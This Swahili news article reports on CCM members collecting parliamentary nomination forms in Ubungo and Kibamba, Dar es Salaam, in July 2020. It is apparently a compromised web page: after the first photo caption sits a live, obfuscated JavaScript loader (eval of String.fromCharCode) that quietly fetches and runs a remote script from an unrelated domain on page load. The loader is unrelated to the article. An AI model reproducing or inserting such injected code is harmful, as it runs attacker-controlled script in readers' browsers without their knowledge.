Recent Comments

154 wachukua fomu kuwania Ubunge Ubungo, Kibamba CCM

By Juma Issihaka Jul 14, 2020
<p>Katibu wa CCM Wilaya ya Ubungo ambaye kwa mujibu wa Katiba ya chama hicho ndiye Mkurugenzi wa Uchaguzi wilayani humo, Chief Yaredi (Kushoto) akikabidhi fomu kwa mgombea wa Ubunge Jimbo la Kibamba Martin Msuha, wakati wa zoezi la ugawaji fomu kuwania nafasi hizo lililofanyika Kimara Stop Over, jijini Dar es Salaam</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Katibu wa CCM Wilaya ya Ubungo ambaye kwa mujibu wa Katiba ya chama hicho ndiye Mkurugenzi wa Uchaguzi wilayani humo, Chief Yaredi (Kushoto) akikabidhi fomu kwa mgombea wa Ubunge Jimbo la Kibamba Martin Msuha, wakati wa zoezi la ugawaji fomu kuwania nafasi hizo lililofanyika Kimara Stop Over, jijini Dar es Salaam

DEMOKRASIA imetawala katika mchakato wa uchukuaji fomu kwa Makada wa CHAMA Cha Mapinduzi (CCM), wanaowania nafasi za Ubunge katika Majimbo ya Kibamba na Ubungo baada ya kushuhudiwa mchakato wa wazi na haki wa uchukuaji fomu ulioanza jana.

Mchakato huo ulifanyika katika Ofisi za CCM Wilaya hiyo, ambapo makada hao waliwasili ofisini hapo Kabla ya saa mbili asubuhi muda ambao ni mapema kuliko ule  uliotangazwa na uongozi wa chama hicho kuanza kwa shughuli ya utoaji wa fomu hizo.

Idadi lukuki ya wanachama wa CCM wamejitokeza katika ofisi hizo yakiwemo makundi mbalimbali kama ya wenye ulemavu wa ngozi, uono hafifu na kusikia wamejitokeza pia kwenye mchakato huo.

Baadhi ya makada hao wamezungumza na Uhuru juu ya kilichowasukuma kuwania nafasi hizo, kueleza kuwa wamechoshwa na hali duni ya maendeleo katika majimbo hayo iliyosababishwa na uongozi mbovu wa wabunge waliomaliza muda wao.
Martin Msuha, aliyekuwa Mbunge wa jimbo la Mbinga Vijijini mwaka 2015/2020 ambaye nae amejitokeza kuchukua fomu kuwania Jimbo la Kibamba, alisema ameona haja ya kugombea jimboni humo kwani ndipo yalipo makazi yake rasmi hivyo anatambua kwa kina changamoto za jamii jimboni humo.
“Mimi ni mkazi wa Jimbo la Kibamba pia niliwahi kuwa Mwenyekiti wa Serikali ya Mtaa wa Msingwa unaopatikana jimboni hapa, nafasi hiyo imenifanya kutambua kwa kina changamoto za wananchi wa mtaa ule na jimbo kwa ujumla, nasubiri maamuzi ya mamlaka za chama zikiridhia nipeperushe bendera yake, nitafanya nilichotumwa na wananchi na ilani ya chama changu,” alisema.
Naye Ester Mambali, aliyechukua fomu kuwania jimbo la Ubungo alisema amesukumwa na kuminywa kwa fursa za maendeleo kwa wanawake kulikosababishwa na wabunge wa jimbo hilo waliomaliza muda wao.
Alisema kutokana na uzoefu wake na jimbo hilo ukizingatia yeye ni mkazi atatekeleza kiu za wananchi.
Katibu wa CCM Wilaya ya Ubungo ambaye kwa mujibu wa Katiba ya chama hicho ndiye Mkurugenzi wa Uchaguzi wilayani humo, Chief Yaredi (Kushoto) akikabidhi fomu kwa mgombea wa Ubunge Jimbo la Kibamba Clementina Biita, wakati wa zoezi la ugawaji fomu kuwania nafasi hizo lililofanyika Kimara Stop Over, jijini Dar es Salaam.

Katibu wa CCM wilaya hiyo, ambaye kwa mujibu wa Katiba ya CCM ndiye Mkurugenzi wa Uchaguzi wilayani humo Chief Yaredi, alisema wameona haja ya kuhusisha vyombo vya habari katika mchakato huo ili kuthabiti uimara wa Demokrasia ndani ya CCM.

Alisema muhimu ni wanahabari wasifungamane na upande wowote wa mgombea.
Aliongeza kuwa mchakato huo waliuanza saa mbili asubuhi kama ilivyoelekezwa na uongozi wa juu wa chama na kuamua kugawa namba kwa waliojitokeza ili kusiwepo na vurugu za kuingia.
“Wanachama wamejitokeza vya kutosha na nawasihi waendelee kujitokeza kwani tunazo nakaka za fomu 4,000, hadi sasa hatujafikisha ugawaji wa fomu hata 1,000 hivyo waendelee kuja,” alisema.
Mmoja wa Makada wa CCM Vicky Kamata, akionyesha fomu ya Ubunge baada ya kukabidhiwa, alipokwenda kuchukua fomu katika ofisi za CCM wilayani humo kwa ajili ya kuomba ridhaa ya chama kumteua kugombea jimbo la Kibamba leo.

Yaredi alisema kwa jana waligawa fomu kwa watu wa makundi mbalimbali ikiwemo wenye ulemavu wa kuona, kusikia na ualbino ambapo makundi hayo yalipewa kipaumbele.

Hadi zoezi hilo linafungwa saa kumi kamili alasiri leo tayari makada waliochukua fomu za kuomba ridhaa kwa mamlaka za chama hicho kuwateua kuwania nafasi ya ubunge kwa jimbo la Kibamba walikuwa 91 wakati jimbo la Ubungo walikuwa 63.
Kwa upande wake Katibu wa Umoja wa Wanawake (UWT) Janeth Mnyaga, alisema kwa wanaowania nafasi za udiwani Viti Maalumu hadi saa kumi alasiri waliochukua fomu walikuwa 43.
Alisema bado wanaendelea na utoaji wa fomu hadi Julai 17 mwaka huu, kulingana na maelekezo ya chama.

By Juma Issihaka

Juma Issihaka, is the senior journalist with more than five years of experience on the profession. He mostly base on Politics reporting, Environment reporting as well as social affairs.